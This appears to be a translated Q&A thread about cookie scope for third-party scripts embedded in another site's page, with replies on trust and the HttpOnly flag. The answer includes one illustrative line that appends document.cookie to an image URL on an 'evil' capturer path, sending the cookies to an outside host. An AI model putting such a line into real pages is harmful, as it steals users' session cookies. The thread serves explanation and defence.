我在网上阅读了很多关于 cookie 的内容,但没有解决这个问题:假设我在 a.com 有一个服务器,b.com 提供的网页在该网页中嵌入了一个脚本,该脚本继续存在我的服务器:
<script src='a.com/script.js'></script>
该脚本在设置 cookie 方面允许做什么?它可以用domain=a.com 设置一个cookie吗?我假设是这样,因为脚本是从该域提供的。它还可以使用domain=b.com 设置一个cookie,因为该页面是从该服务器提供的吗?
我试图弄清楚“第一方”和“第三方”在从另一个主机的网页调用的脚本的上下文中是什么意思。
【问题讨论】:
标签: javascript cookies cross-domain same-origin-policy
我不认为 .js 文件的来源是相关的。 cookie 域与正在呈现的文档的域有关。
如果我访问 http://www.b.com/ 并且它包括
<script src="http://www.a.com/some/file.js"></script>
那么 b.com 就相信 a.com 的代码会以善意行事。代码作为正在查看的页面的一部分执行。由于 javascript 代码将在浏览器中执行,因此它可以从 b.com 读取 cookie,并通过在 src 包含数据的文档中创建标签来传递该数据。
例如,如果 a.com 的 javascript 文件包含
document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
然后a.com的恶意站长可以检查他的web服务器日志并查看b.com的cookies。
那么,问题是,如果 a.com 是恶意的,为什么 b.com 会在其页面中包含来自 a.com 的代码?他们可能没有。作为网络开发人员,我们需要验证我们嵌入网站的任何第 3 方代码的可信度。
【讨论】:
HttpOnly 可以防止这种攻击,因为 Javascript 将无法访问 document.cookie。
Note: The domain must match the domain of the JavaScript origin. Setting cookies to foreign domains will be silently ignored. 上看到的,这不是和你说的矛盾吗? developer.mozilla.org/en-US/docs/Web/API/Document/cookie